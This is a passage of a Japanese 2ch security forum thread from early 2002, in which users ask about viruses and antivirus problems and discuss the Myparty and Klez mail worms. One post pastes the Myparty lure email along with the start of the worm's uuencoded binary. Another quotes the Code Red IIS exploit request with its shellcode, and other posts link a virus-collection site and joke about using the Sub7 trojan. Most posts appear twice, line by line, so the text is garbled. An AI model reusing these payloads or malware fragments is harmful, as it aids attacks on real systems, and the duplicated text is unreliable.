102 :名無しさん@お腹いっぱい。:02/01/22 00:49
あ、あのさ、、、
Ad-awareってSub7鯖が起動用に設定するreg値も検出するの?・・・・
つか、怪しいreg値は取り敢えずみんな検出してくれるのかな。。。
Ad-awareってSub7鯖が起動用に設定するreg値も検出するの?・・・・
つか、怪しいreg値は取り敢えずみんな検出してくれるのかな。。。
103 :ヘルプ:02/01/22 00:49
全然英語分からんけど3つあったみたい。
日本語パッチてないのか探してきます。
日本語パッチてないのか探してきます。
104 :名無しさん@お腹いっぱい。:02/01/22 00:53
Ad-awareで駆除できたらノートンいらねーべ。
今日騒いでたマルチポスターです.
ご協力ありがとうございました.
ご協力ありがとうございました.
106 :ヘルプ:02/01/22 01:00
Ad-awareパッチなさそう。
>>104
こ、今度、、、暇有ったらSub7鯖使って
ぢ、ぢっけんしてみるぢょ。。。2.2でいいかな
・・・さ、最近バクダン流行ってるし。
も、漏れはこれから、ぢばくマニアだ。。。
みんな、流行に乗り遅れるな!!
こ、今度、、、暇有ったらSub7鯖使って
ぢ、ぢっけんしてみるぢょ。。。2.2でいいかな
・・・さ、最近バクダン流行ってるし。
も、漏れはこれから、ぢばくマニアだ。。。
みんな、流行に乗り遅れるな!!
108 :ヘルプ:02/01/22 01:11
センター情報の通りチェックしてみました。
とりあえず大丈夫そうです。
多少不安(検出ウイルスと情報ウイルス名が微妙に違う。)ですが。
とりあえず大丈夫そうです。
多少不安(検出ウイルスと情報ウイルス名が微妙に違う。)ですが。
http://vx.netlux.org/dat/vct.shtml
ウイルス250種
http://www.ebcvg.com/binary.php
Empire248はBloodhoundFileString(右端の上から6番目)
http://www.symantec.com/region/jp/sarcj/data/b/bloodhound.html
http://www.symantec.com/avcenter/reference/heuristc.pdf
ウイルス250種
http://www.ebcvg.com/binary.php
Empire248はBloodhoundFileString(右端の上から6番目)
http://www.symantec.com/region/jp/sarcj/data/b/bloodhound.html
http://www.symantec.com/avcenter/reference/heuristc.pdf
110 :通りすがも:02/01/22 04:42
111 :名無しさん@お腹いっぱい。:02/01/22 04:46
Ad-awareはこちらで
http://pc.2ch.net/test/read.cgi/sec/1010952801/1-10
http://pc.2ch.net/test/read.cgi/sec/1010952801/1-10
112 : :02/01/22 15:53
113 :名無しさん@お腹いっぱい。:02/01/23 00:21
なぜかセキュ板がすごい重たいんですけど なぜ?
まさか8月のCord Redの悪夢みたいに
新種のウィルスでも暴れ出したとか?
まさか8月のCord Redの悪夢みたいに
新種のウィルスでも暴れ出したとか?
114 :名無しさん@お腹いっぱい。:02/01/23 00:24
>>113
たったいま正常になった
たったいま正常になった
115 :名無しさん@お腹いっぱい。:02/01/23 00:25
>>113
漏れが今↓ツール使ってこのスレにものすごい勢いでsage連続カキコしてるからさ。。
ttp://pc.2ch.net/test/read.cgi/sec/995357953
・・・・ぢゃまするなよ。。。。
漏れが今↓ツール使ってこのスレにものすごい勢いでsage連続カキコしてるからさ。。
ttp://pc.2ch.net/test/read.cgi/sec/995357953
・・・・ぢゃまするなよ。。。。
116 : :02/01/23 14:49
117 : :02/01/25 07:15
118 :名無しさん@お腹いっぱい。:02/01/25 07:59
119 :名無しさん@お腹いっぱい。:02/01/25 11:17
ネット初心者です。無料でインストールできるワレザーソフトのダウンロードサイトがありましたら教えて頂けませんか?
ソフトぐらい買えよ(w
121 :名無しさん@お腹いっぱい。:02/01/26 18:55
何か重くない?
自分のとこだけ?
何か新種のウィルス流行って無い?
自分のとこだけ?
何か新種のウィルス流行って無い?
122 :チチカ:02/01/26 23:38
あのー、美女が出てきてそのうちその美女の目が黒くなって
そのうちキャーって叫び声がするウィルスって知ってる人
いますか?友達が感染したみたいで・・・
ウィルスかどうかもまだ分かってないんですけどね。
そのうちキャーって叫び声がするウィルスって知ってる人
いますか?友達が感染したみたいで・・・
ウィルスかどうかもまだ分かってないんですけどね。
123 :名無しさん@お腹いっぱい。:02/01/26 23:41
それはコワイ(w
124 :名無しさん@お腹いっぱい。:02/01/26 23:47
>>122
大変だ!新種じゃないのか?
大変だ!新種じゃないのか?
126 :名無しさん@お腹いっぱい。:02/01/27 00:04
Norton Anti Virusを使っているのですが
設定画面で「このページでスクリプトエラーが発生しました」と出て
設定が変更できません。
それから再起動したら赤い画面が出て
「ウィルススキャンエンジンのデータベースを初期化できません」と出ます。
Live Updateをしても何も起こりません。
これはどういう事なのでしょうか?
設定画面で「このページでスクリプトエラーが発生しました」と出て
設定が変更できません。
それから再起動したら赤い画面が出て
「ウィルススキャンエンジンのデータベースを初期化できません」と出ます。
Live Updateをしても何も起こりません。
これはどういう事なのでしょうか?
>>126
定義ファイルのアップロードに失敗して、スクリプトエラー表示はあるけど。
「初期化できません」の画面は見たことないですね。
再インストしたら?
HDをはずして、他のPCのスレーブに接続してウイルススキャンするのもオツ。
定義ファイルのアップロードに失敗して、スクリプトエラー表示はあるけど。
「初期化できません」の画面は見たことないですね。
再インストしたら?
HDをはずして、他のPCのスレーブに接続してウイルススキャンするのもオツ。
128 :チチカ:02/01/27 03:29
122です。ウィルスであることを確認しました。
2CHのあるサイトからDLしたものだそうです。
皆さんも気をつけてください。
ウイルス名: TROJ_MODNAR.A
別 名: W32/Modnar@MM, W32.Modnar.Worm@mm, TROJ_DOCPIF.A
ウイルス種類: トロイの木馬型(ワーム)
プラットフォーム: Win9x/Me/NT/2000
暗号化: No
ウイルスサイズ: 180224bytes
初発見日: 2001年7月末
発病条件 1: ファイル実行時
破壊活動 1: メールを自動送信する
2CHのあるサイトからDLしたものだそうです。
皆さんも気をつけてください。
ウイルス名: TROJ_MODNAR.A
別 名: W32/Modnar@MM, W32.Modnar.Worm@mm, TROJ_DOCPIF.A
ウイルス種類: トロイの木馬型(ワーム)
プラットフォーム: Win9x/Me/NT/2000
暗号化: No
ウイルスサイズ: 180224bytes
初発見日: 2001年7月末
発病条件 1: ファイル実行時
破壊活動 1: メールを自動送信する
129 :名無しさん@お腹いっぱい。:02/01/27 03:59
130 :名無しさん@お腹いっぱい。:02/01/27 04:17
JS_EXCEPTION.GENとゆうウイルスについて教えてください
131 :名無しさん@お腹いっぱい。:02/01/27 04:27
>>130
http://www.google.co.jp/search?q=JS_EXCEPTION.GEN+%83E%83B%83%8B%83X+%8F%EE%95%F1&hl=ja&lr=on&btnG=Google+%8C%9F%8D%F5
http://www.google.co.jp/search?q=JS_EXCEPTION.GEN+%83E%83B%83%8B%83X+%8F%EE%95%F1&hl=ja&lr=on&btnG=Google+%8C%9F%8D%F5
132 :名無しさん@お腹いっぱい。:02/01/27 04:43
>>131
どうもです。あんまり心配しなくてもいいでホッとしました。
どうもです。あんまり心配しなくてもいいでホッとしました。
133 :名無し:02/01/27 06:20
134 : :02/01/28 12:26
www.myparty.yahoo.com
っていうWindowsバイナリが
uuencodeで添付されてきたひといますか?
Hello!
My party... It was absolutely amazing!
I have attached my web page with new photos!
If you can please make color prints of my photos. Thanks!
begin 666 www.myparty.yahoo.com
M35J0``,````$````__\``+@`````````0```````````````````````````
M````````````````````@`````X?N@X`M`G-(;@!3,TA5&AI<R!P<F]G<F%M
M(&-A;FYO="!B92!R=6X@:6X@1$]3(&UO9&4N#0T*)`````````!010``3`$#
M`)(B4CP``````````.``#P$+`04``'`````0````T```X$P!``#@````4`$`
っていうWindowsバイナリが
uuencodeで添付されてきたひといますか?
Hello!
My party... It was absolutely amazing!
I have attached my web page with new photos!
If you can please make color prints of my photos. Thanks!
begin 666 www.myparty.yahoo.com
M35J0``,````$````__\``+@`````````0```````````````````````````
M````````````````````@`````X?N@X`M`G-(;@!3,TA5&AI<R!P<F]G<F%M
M(&-A;FYO="!B92!R=6X@:6X@1$]3(&UO9&4N#0T*)`````````!010``3`$#
M`)(B4CP``````````.``#P$+`04``'`````0````T```X$P!``#@````4`$`
136 :名無しさん@お腹いっぱい。:02/01/28 17:33
>>135
うちにも来た。 情報収集中…
うちにも来た。 情報収集中…
137 :名無しさん@お腹いっぱい。:02/01/28 17:35
138 :名無しさん@お腹いっぱい。:02/01/28 17:37
139 :NOTEPAD.EXE:02/01/28 17:38
WARM_MYPARTY.Aというものらしいです。
新手のワームでした。みなさんもお気をつけて。
http://www.trendmicro.co.jp/vinfo/virusencyclo/default5.asp?VName=WORM_MYPARTY.A
http://www.trendmicro.co.jp/vinfo/virusencyclo/default5.asp?VName=WORM_MYPARTY.A
141 :こんなんでました:02/01/28 17:45
おそらく、www.miparty.yahoo.comというコマンドファイルと思われ。
142 :NOTEPAD.EXE:02/01/28 17:46
144 :名無しさん@お腹いっぱい。:02/01/28 17:55
145 :名無しさん@お腹いっぱい。:02/01/28 17:58
146 :名無しさん@お腹いっぱい。:02/01/28 18:01
>>140
アクセス重いっす。
アクセス重いっす。
MYPARTY
特徴:
これは、ワームに分類される「トロイの木馬型」不正プログラムで
す。自身のコピーを頒布するワーム活動を行います。
対応方法:
検出方法:
1)最新の検索エンジン・パターンファイルにアップデートしてくださ
い。
2)「手動検索」にてシステム全体を検索してください。
3)検出したファイルを削除してください。
一個のプログラムのため「駆除」できません。検知した場合は、ファ
イルを「削除」してください。
「ウイルス発見時の処理」の設定が「ウイルス駆除」になっている場
合、「駆除失敗」となることがあります。その際は、検知したファイル
を「削除」していただければ、問題ありません。
特徴:
これは、ワームに分類される「トロイの木馬型」不正プログラムで
す。自身のコピーを頒布するワーム活動を行います。
対応方法:
検出方法:
1)最新の検索エンジン・パターンファイルにアップデートしてくださ
い。
2)「手動検索」にてシステム全体を検索してください。
3)検出したファイルを削除してください。
一個のプログラムのため「駆除」できません。検知した場合は、ファ
イルを「削除」してください。
「ウイルス発見時の処理」の設定が「ウイルス駆除」になっている場
合、「駆除失敗」となることがあります。その際は、検知したファイル
を「削除」していただければ、問題ありません。
活動:
ワームを実行すると、自身のコピーファイルを作成し実行します。こ
のファイルは C:\Recycled フォルダに"REGCTRL.EXE"という名称を使用
していることを確認しています。
そして、マシンのレジストリよりデフォルトで使用されている SMTP
サーバの情報、また「Windows のアドレス帳ファイル」よりメールアド
レスの情報を取得します。
これらの情報を取得できた場合には、SMTP サーバを使用して以下の内
容でメール送信を行います。
ワームを実行すると、自身のコピーファイルを作成し実行します。こ
のファイルは C:\Recycled フォルダに"REGCTRL.EXE"という名称を使用
していることを確認しています。
そして、マシンのレジストリよりデフォルトで使用されている SMTP
サーバの情報、また「Windows のアドレス帳ファイル」よりメールアド
レスの情報を取得します。
これらの情報を取得できた場合には、SMTP サーバを使用して以下の内
容でメール送信を行います。
149 :名無しさん@お腹いっぱい。:02/01/28 18:14
さっさとパターンファイルアップデートできたよ。
ありがとう2chよ。。。。今日程有り難いと思ったことはない
ありがとう2chよ。。。。今日程有り難いと思ったことはない
150 :名無しさん@お腹いっぱい。:02/01/28 18:14
うちも、来たよ。
しかも、大量に。
正直、社内に蔓延・・・・・。
わたし、情シス兼ヘルプデスクなんでマジ打つだ。
いままでの、虫なら未定義でも最低でもスキャンに引っかかりはしたのになぁ。
今回は見事にスルーしやがったぁ!!
しかも、大量に。
正直、社内に蔓延・・・・・。
わたし、情シス兼ヘルプデスクなんでマジ打つだ。
いままでの、虫なら未定義でも最低でもスキャンに引っかかりはしたのになぁ。
今回は見事にスルーしやがったぁ!!
151 :NOTEPAD.EXE:02/01/28 18:21
ウィルスバスターはパターン210以降にするひつようがあります。
152 :名無しさん@お腹いっぱい。:02/01/28 18:21
シマンテックだけ日本語の情報がないな。
http://www.trendmicro.co.jp/vinfo/virusencyclo/default5.asp?VName=WORM_MYPARTY.A
http://www.nai.com/japan/virusinfo/virM.asp?v=W32/Myparty@MM
http://securityresponse.symantec.com/avcenter/venc/data/[email protected]
http://www.trendmicro.co.jp/vinfo/virusencyclo/default5.asp?VName=WORM_MYPARTY.A
http://www.nai.com/japan/virusinfo/virM.asp?v=W32/Myparty@MM
http://securityresponse.symantec.com/avcenter/venc/data/[email protected]
akaneで検索したらファイルがズラーとでてきびっくりしたよ
じつは,仲根かすみのjpgだったよ
びっくり
じつは,仲根かすみのjpgだったよ
びっくり
154 :s:02/01/28 19:12
>>152
> シマンテックだけ日本語の情報がないな。
出たけど、まだ空っぽ。
http://www.symantec.com/region/jp/sarcj/cgi-bin/virauto.cgi?vid=27750
> シマンテックだけ日本語の情報がないな。
出たけど、まだ空っぽ。
http://www.symantec.com/region/jp/sarcj/cgi-bin/virauto.cgi?vid=27750
155 :名無しさん@お腹いっぱい。:02/01/28 19:19
シマンテックってトレンドより遅いのかな?
良く言えば慎重?
良く言えば慎重?
156 :名無しさん@お腹いっぱい。:02/01/28 19:24
シマンテックのウイルス送付窓口のメアド、誰か知らない?
トレンドは見つけ次第片っ端から送っているんだけど。
トレンドは見つけ次第片っ端から送っているんだけど。
158 :名無しさん@お腹いっぱい。:02/01/28 19:32
159 :名無しさん@お腹いっぱい。:02/01/28 19:33
160 :名無しさん@お腹いっぱい。:02/01/28 19:33
>>158
張った時点で同罪。
張った時点で同罪。
あぁ・・このURLはると誤解されそう・・
madokaとは関係ないです。。
ただの画像と音をフルスクリーンで表示させるホームページ。
madokaとは関係ないです。。
ただの画像と音をフルスクリーンで表示させるホームページ。
164 :名無しさん@お腹いっぱい。:02/01/28 19:40
>>163
何を見つけたの??
何を見つけたの??
今ちょっと暇なので、窓口探しの旅に出てます。
166 :名無しさん@お腹いっぱい。:02/01/28 19:41
トレンドってメアドでウィルス送るの?大変そう・・
[email protected] ←ここではない・・よね?
[email protected] ←ここではない・・よね?
167 :名無しさん@お腹いっぱい。:02/01/28 19:45
>>165-166
ウイルスバスターから送るんだが。隔離した後、解析依頼。
フリーで解析してくれるところってあるのだろうか?
とりあえず、バスターはパターン211。
ノートン、マカフィー使っている人もちゃんと更新しましょう。
ウイルスバスターから送るんだが。隔離した後、解析依頼。
フリーで解析してくれるところってあるのだろうか?
とりあえず、バスターはパターン211。
ノートン、マカフィー使っている人もちゃんと更新しましょう。
169 :名無しさん@お腹いっぱい。:02/01/28 20:29
170 :初心者:02/01/28 20:37
質問いいですか?
パソコン立ち上げたらメモ帳がひたすら開く、これってウィルスですか?
直し方教えてください
パソコン立ち上げたらメモ帳がひたすら開く、これってウィルスですか?
直し方教えてください
172 :名無しさん@お腹いっぱい。:02/01/28 21:11
173 :初心者:02/01/28 21:30
>172
スタートアップからにしたけど直んないよー!助けて!
スタートアップからにしたけど直んないよー!助けて!
174 :名無しさん@お腹いっぱい。:02/01/28 21:35
>>173
それウイルスじゃないの?メモ帳に寄生するものがあると聞いたことがあるよ。
それウイルスじゃないの?メモ帳に寄生するものがあると聞いたことがあるよ。
176 :名無しさん@お腹いっぱい。:02/01/28 21:40
>>173
「メモ帳」「ウイルス」で検索すると山ほど引っかかる
「メモ帳」「ウイルス」で検索すると山ほど引っかかる
177 :名無しさん@お腹いっぱい。:02/01/28 21:49
捕獲していないのだが >www.yahoo.com
感染手段はダブルクリックか? (w
感染手段はダブルクリックか? (w
178 :名無しさん@お腹いっぱい。:02/01/28 21:51
すみません、あまり知らないとはいえ
混乱してスレを立ててしまったんですが、
わかる方、教えてください!
今日yahoonewsで発表されたウイルスは
どういう被害があるんでしょうか?
感染してしまったと思うのですが・・・
まだ症状等含めてよくわからないんです!!
お願いします!
http://pc.2ch.net/test/read.cgi/sec/1012220835/
混乱してスレを立ててしまったんですが、
わかる方、教えてください!
今日yahoonewsで発表されたウイルスは
どういう被害があるんでしょうか?
感染してしまったと思うのですが・・・
まだ症状等含めてよくわからないんです!!
お願いします!
http://pc.2ch.net/test/read.cgi/sec/1012220835/
179 :名無しさん@お腹いっぱい。:02/01/28 21:54
レスを読まずに書き込むな。
180 :名無しさん@お腹いっぱい。:02/01/28 21:56
単発質問スレ & マルチ のダブルパンチ!
181 :名無しさん@お腹いっぱい。:02/01/28 21:59
ログ読む気なしの教えて君、危惧が当たってT.K.O
183 :初心者:02/01/28 22:02
治せない・・・死亡かな?
会社のパソコンで、MXを用いて動画をダウンロードしてたんです。
なにをダウンロードしていたかは聞かないでください。
それで、完了後にそれをダブルクリックして再生させたところ
WMPが立ち上がって最初の何秒か映し出されたそのとき、
いきなりシャットダウンしてされてしまったんです。
Win2000(管理者じゃないない)でいきなり
シャットダウンなんてさせられるのでしょうか?
そもそも、動画にそんなプログラムを組み込ませられるのでしょうか?
後生ですから教えてください。
なにをダウンロードしていたかは聞かないでください。
それで、完了後にそれをダブルクリックして再生させたところ
WMPが立ち上がって最初の何秒か映し出されたそのとき、
いきなりシャットダウンしてされてしまったんです。
Win2000(管理者じゃないない)でいきなり
シャットダウンなんてさせられるのでしょうか?
そもそも、動画にそんなプログラムを組み込ませられるのでしょうか?
後生ですから教えてください。
185 :名無しさん@お腹いっぱい。:02/01/28 22:38
>>185
いえ。後遺症は全くないのですが、ウィン2000で
そんなことされるなんて思ったことも無かったので・・・。
WMPで読み込んでもその地雷は発動しちゃうんでしょうか?
怖くて家ではMXできません。ブルブル
いえ。後遺症は全くないのですが、ウィン2000で
そんなことされるなんて思ったことも無かったので・・・。
WMPで読み込んでもその地雷は発動しちゃうんでしょうか?
怖くて家ではMXできません。ブルブル
187 :名無しさん@お腹いっぱい。:02/01/28 23:32
>>186
会社のほうがやばいとおもうが?
会社のほうがやばいとおもうが?
188 :名無しさん@お腹いっぱい。:02/01/28 23:36
会社でMXの方がヤバい
いえ、いいんです。会社の方は。
なんともいってこないですし。
そんなことよりも、家のマシンが壊れちゃう方がよっぽど
大事です。
なんともいってこないですし。
そんなことよりも、家のマシンが壊れちゃう方がよっぽど
大事です。
190 :名無しさん@お腹いっぱい。:02/01/28 23:38
仕事しろーーバカものーーー
というか、これだけ騒がれてんのに
MX始めるってのもバカデスよね。
もうACCAに眼をつけられたかも・・。
MX始めるってのもバカデスよね。
もうACCAに眼をつけられたかも・・。
192 :名無しさん@お腹いっぱい。:02/01/28 23:41
(;´Д`)ACCA?
仕事をしてる間に自動DLさせて置くんですよ。
仕事はしてますって。
仕事はしてますって。
194 :名無しさん@お腹いっぱい。:02/01/28 23:44
>>193
ばかすぎる
ばかすぎる
196 :名無しさん@お腹いっぱい。:02/01/28 23:53
>>195
逝ってろ!
逝ってろ!
197 :名無しさん@お腹いっぱい。:02/01/28 23:54
198 :名無しさん@お腹いっぱい。:02/01/29 00:03
すいません、なんか、さっき友達のアドレスでメールがきてそれを開いたら
デリバリーなんたらって言う奴が(送受信するたびに)数十件入ってくるんです。
で、友達の携帯にも数十件の俺のアドレスからのメールがおくられてるらしいんですけど、
これどういうウィルスなんでしょうか?直す方法とかありませんか?
デリバリーなんたらって言う奴が(送受信するたびに)数十件入ってくるんです。
で、友達の携帯にも数十件の俺のアドレスからのメールがおくられてるらしいんですけど、
これどういうウィルスなんでしょうか?直す方法とかありませんか?
199 :名無しさん@お腹いっぱい。:02/01/29 00:04
デタ━━━━━━━━(゚∀゚)━━━━━━━━!!
ファイるロー愚の時代かな。
201 :名無しさん@おなかいっぱい:02/01/29 02:51
このスレすべて表示にするとウィルスが出るよ
202 :名無しさん@お腹いっぱい。:02/01/29 10:19
WORM_MYPARTY.A
今朝、早速、2通来たよ
添付ファイル名 www.myparty.yahoo.com
今朝、早速、2通来たよ
添付ファイル名 www.myparty.yahoo.com
203 :名無しさん@お腹いっぱい。:02/01/29 10:21
俺も昨日来たな。
partyウイルス。これが2月のBadtransになるか?
partyウイルス。これが2月のBadtransになるか?
204 :名無しさん@お腹いっぱい。:02/01/29 10:44
今朝、ヤフーから登録確認のメールが来ていました。
覚えがないので間違いだろうと、登録削除しましたが、
なんか関係あるんでしょうか?
そもそもメアド間違って登録するなんて事、そうあるのかなあと、
妙な気はしたんですが。
そういえば、パスワードだったか登録名だったかが、
ai**-love****-**(*はいちおう当方で伏せ字)なんて
考えたら怪しいですね。
登録者が単に**歳の愛ちゃんって人なのかもしれませんが。(笑
ウィルスチェックには反応しなかったです。
覚えがないので間違いだろうと、登録削除しましたが、
なんか関係あるんでしょうか?
そもそもメアド間違って登録するなんて事、そうあるのかなあと、
妙な気はしたんですが。
そういえば、パスワードだったか登録名だったかが、
ai**-love****-**(*はいちおう当方で伏せ字)なんて
考えたら怪しいですね。
登録者が単に**歳の愛ちゃんって人なのかもしれませんが。(笑
ウィルスチェックには反応しなかったです。
205 :名無しさん@お腹いっぱい。:02/01/29 11:25
Undeliverable mail--"hoge"
っていうSubjectで配送できなかったメールを装ってやってくるウイルスが
2通来た。差出人は[email protected]のようにpostmasterを名乗っている。
ヘッダー読むと1通は *.att.ne.jp
もう1通はtwドメインだった。
添付ファイルのサイズは82kb
HTMLファイルとウイルスの2つのファイルが添付されている。
このウイルス何?色々調べたんだけど見つからず。
っていうSubjectで配送できなかったメールを装ってやってくるウイルスが
2通来た。差出人は[email protected]のようにpostmasterを名乗っている。
ヘッダー読むと1通は *.att.ne.jp
もう1通はtwドメインだった。
添付ファイルのサイズは82kb
HTMLファイルとウイルスの2つのファイルが添付されている。
このウイルス何?色々調べたんだけど見つからず。
206 :名無しさん@お腹いっぱい。:02/01/29 12:06
>>205
ウィルスがenvelope senderを詐称して送っている可能性あり。
送った先に届かないと、エラーメール(差出人は当然postmaster)は
ウィルス送信者ではなく、envelope senderに届く。
envelope senderは必ずしもヘッダのFrom:とは一致しないので注意。
最近流行したものだと、Klezがこのような送信者の詐称をおこなう。
Klez.Eならファイルサイズもほぼ一致する。詐称するアドレスのリストは
http://a500.g.akamai.net/7/1776/484/00002/inet.trendmicro.co.jp/solutionfile/3250KLEZ.htm
http://www.nai.com/japan/virusinfo/virK.asp?v=W32/Klez@MM
にあるが、どうやらこれ以外のアドレスでウィルスを送信する亜種も
大量に出回っている模様。
ウィルスがenvelope senderを詐称して送っている可能性あり。
送った先に届かないと、エラーメール(差出人は当然postmaster)は
ウィルス送信者ではなく、envelope senderに届く。
envelope senderは必ずしもヘッダのFrom:とは一致しないので注意。
最近流行したものだと、Klezがこのような送信者の詐称をおこなう。
Klez.Eならファイルサイズもほぼ一致する。詐称するアドレスのリストは
http://a500.g.akamai.net/7/1776/484/00002/inet.trendmicro.co.jp/solutionfile/3250KLEZ.htm
http://www.nai.com/japan/virusinfo/virK.asp?v=W32/Klez@MM
にあるが、どうやらこれ以外のアドレスでウィルスを送信する亜種も
大量に出回っている模様。
207 :名無しさん@お腹いっぱい。:02/01/29 12:42
JS_EXCEPTに感染してるらしいのですが、
どのような害があるのですか?
どのような害があるのですか?
208 :205:02/01/29 13:24
209 :名無しさん@お腹いっぱい。:02/01/29 13:36
>>207
ウィルス辞典で自分で調べろ
ウィルス辞典で自分で調べろ
210 : :02/01/30 14:55
211 :名無しさん@お腹いっぱい。:02/01/30 17:26
ノートンアンチウイルスなんすけど
PC起動時にウイルスチェックにスケジュールしてるけど
起動時にウイルスチェックが動かんぞ。
なんでかね?
PC起動時にウイルスチェックにスケジュールしてるけど
起動時にウイルスチェックが動かんぞ。
なんでかね?
212 :名無しさん@お腹いっぱい。:02/01/30 17:35
>>211
OSは何ね?
OSは何ね?
213 :名無しさん@お腹いっぱい。:02/01/30 17:36
214 :名無しさん@お腹いっぱい。:02/01/30 17:59
厨な質問でごめん
CODEREDがIISサーバーに攻撃かけるときに
GET /default.ida?XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX%u9090%u6858%ucbd3%u7801%u9090%
u6858%ucbd3%u7801%u9090%u6858%ucbd3%u7801%u9090%u9090%u8190%u00c3%u0
003%u8b00%u531b%u53ff%u0078%u0000%u00=a
って文字列飛ばすけど
%u9090%u6858%ucbd3%u7801%u9090%u6858%ucbd3%u7801%u9090%u6858%u
cbd3%u7801%u9090%u9090%u8190%u00c3%u0003%u8b00%u531b%u53ff%u0078%u0000%u00=a
この部分って何やってるの?
CODEREDがIISサーバーに攻撃かけるときに
GET /default.ida?XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX%u9090%u6858%ucbd3%u7801%u9090%
u6858%ucbd3%u7801%u9090%u6858%ucbd3%u7801%u9090%u9090%u8190%u00c3%u0
003%u8b00%u531b%u53ff%u0078%u0000%u00=a
って文字列飛ばすけど
%u9090%u6858%ucbd3%u7801%u9090%u6858%ucbd3%u7801%u9090%u6858%u
cbd3%u7801%u9090%u9090%u8190%u00c3%u0003%u8b00%u531b%u53ff%u0078%u0000%u00=a
この部分って何やってるの?
215 : :02/01/30 18:29
オナニー
216 :名無しさん@お腹いっぱい。:02/01/30 18:56
あのぉ…今日お客さんとこでトレンドの InterScan VirusWall(NT版)
メンテしてたんですけど、トレンドがテスト用に配布してる Eicar.com
ってテストウイルスがあるじゃないですか。それで送受信のテストを
してたんですけど、チェックすり抜けちゃうんですけど・・・
昨日も同じテストを実施して、そん時はちゃんとテストウイルスを
ブロックしてたし、InterScan が入ってるサーバが2台ほどあるんですが
どっちもすりぬけちゃってるんです。
個人的には今日になって更新されたパターンファイル214が怪しいと
踏んでいるのですが、どなたか同じようにはまってませんか?
メンテしてたんですけど、トレンドがテスト用に配布してる Eicar.com
ってテストウイルスがあるじゃないですか。それで送受信のテストを
してたんですけど、チェックすり抜けちゃうんですけど・・・
昨日も同じテストを実施して、そん時はちゃんとテストウイルスを
ブロックしてたし、InterScan が入ってるサーバが2台ほどあるんですが
どっちもすりぬけちゃってるんです。
個人的には今日になって更新されたパターンファイル214が怪しいと
踏んでいるのですが、どなたか同じようにはまってませんか?
218 :名無しさん@お腹いっぱい。:02/01/30 19:37
詳しい説明はともかく「X」の羅列がバッファオーバーフローを起こすパディング文字列、その後ろが実際の攻撃コード。(ちなみにこの一行目だけでなく、文字列全体で数KBあるぜよ)
219 : :02/01/30 19:53
220 :名無しさん@お腹いっぱい。:02/01/30 20:18
221 : :02/01/30 20:21
パターン216に変わってるよー
222 :名無しさん@お腹いっぱい。:02/01/30 20:49
216だとeicarはちゃんとはじいてくれるよ。
214でも大丈夫だったと思う。
214でも大丈夫だったと思う。
223 :名無しさん@お腹いっぱい。:02/01/30 20:55
224 :名無しさん@お腹いっぱい。:02/01/30 21:55
パターン214ではeicarだめだったずら。
VB2002、VBCorpでも。
VB2002、VBCorpでも。
225 :名無しさん@Emacs:02/01/30 22:07
eicar以外のウィルスをぶつけてみて、ちゃんと検出できるか確認
OKならトレンドにクレーム
NGならおまえの設定がアホ
いずれにしてもここでうだうだ言ってても埒があかんずら。
OKならトレンドにクレーム
NGならおまえの設定がアホ
いずれにしてもここでうだうだ言ってても埒があかんずら。
226 :205:02/01/30 22:10
205です。
私に送られてきたKlez.Eなんですが、どうやらウイルスによって
送信されたメールではなく、悪意ある人間の仕業のようです。
理由は
・envelope-fromとFromが異なり、Fromだけpostmasterを名乗っていること
・twドメイン内にある、「envelopeを偽装することで」第三者中継が可能と
なるSMTPサーバーからメールを送信していること
・同一のマシンから、別の第三者中継が可能なSMTPサーバー経由でもう1通別の
ウイルス付きメールが送られてきたこと
206さんはエラーメールが「本物の」postmasterによって返信されることで私
に届いたのでは?とおっしゃっていましたが、今回[email protected]と
なっている「HOGEHOGE.COM」の部分はただの転送メールアドレスなので、
postmasterアカウントでメールが送られることはあり得ないです。また、ヘッダー
のReceivedを追ってみてもそれが確認できます。
で、このウイルス送信しまくりなマシンのIPは
*.ftthosaka.att.ne.jp
なんですが、どなたか同じように送られてきた方いらっしゃいませんか?
私に送られてきたKlez.Eなんですが、どうやらウイルスによって
送信されたメールではなく、悪意ある人間の仕業のようです。
理由は
・envelope-fromとFromが異なり、Fromだけpostmasterを名乗っていること
・twドメイン内にある、「envelopeを偽装することで」第三者中継が可能と
なるSMTPサーバーからメールを送信していること
・同一のマシンから、別の第三者中継が可能なSMTPサーバー経由でもう1通別の
ウイルス付きメールが送られてきたこと
206さんはエラーメールが「本物の」postmasterによって返信されることで私
に届いたのでは?とおっしゃっていましたが、今回[email protected]と
なっている「HOGEHOGE.COM」の部分はただの転送メールアドレスなので、
postmasterアカウントでメールが送られることはあり得ないです。また、ヘッダー
のReceivedを追ってみてもそれが確認できます。
で、このウイルス送信しまくりなマシンのIPは
*.ftthosaka.att.ne.jp
なんですが、どなたか同じように送られてきた方いらっしゃいませんか?
227 :名無しさん@お腹いっぱい。:02/01/30 22:10
228 :名無しさん@お腹いっぱい。:02/01/31 09:11
WINXPを導入して、しばらくMXとか使ってたら、ある日突然
デスクトップに「Death-Gm02」って18MBほどのmpegファイルが
あったのよ。
ダウンロードした覚えはないんだけど、開いてみたら延々とテトリ
スをやってる動画が流れてる・・・これってウイルスなのかな
デスクトップに「Death-Gm02」って18MBほどのmpegファイルが
あったのよ。
ダウンロードした覚えはないんだけど、開いてみたら延々とテトリ
スをやってる動画が流れてる・・・これってウイルスなのかな
229 :名無しさん@お腹いっぱい。:02/01/31 09:47
>228
ダウンロードした覚えがないのにデスクトップにあったというのが疑問だけど…
ぐぐるで検索したらこんなんでました。
http://www.google.com/search?hl=ja&q=Death-Gm02+%83E%83B%83%8B%83X&lr=
ダウンロードした覚えがないのにデスクトップにあったというのが疑問だけど…
ぐぐるで検索したらこんなんでました。
http://www.google.com/search?hl=ja&q=Death-Gm02+%83E%83B%83%8B%83X&lr=
